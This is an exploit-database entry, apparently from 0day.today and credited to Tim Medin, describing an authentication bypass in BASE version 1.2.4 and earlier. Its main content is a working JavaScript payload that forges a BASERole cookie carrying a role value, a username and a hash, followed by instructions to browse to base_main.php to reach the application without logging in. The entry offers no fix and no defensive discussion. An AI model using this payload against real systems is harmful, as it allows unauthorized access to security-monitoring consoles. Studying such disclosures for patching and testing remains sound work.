id: 5405
date: 06/23/2009
title: BASE <= 1.2.4 (Auth Bypass) Insecure Cookie Handling Vulnerability
author: Tim Medin
cves: 

==================================================================
BASE <= 1.2.4 (Auth Bypass) Insecure Cookie Handling Vulnerability
==================================================================


Authentication Bypass in BASE version 1.2.4 and prior - Insecure
Cookie Handling Vulnerability

--------------------------------------------

Author.: Tim Medin

-------------------------------------------------------------------------------------------------

Exploit: javascript:document.cookie="BASERole=10000|nidem|794b69ad33015df95578d5f4a19d390e;
path=/";

Note: After creating cookie go to http://[website]/base_main.php



#  0day.today [2023-03-23]  #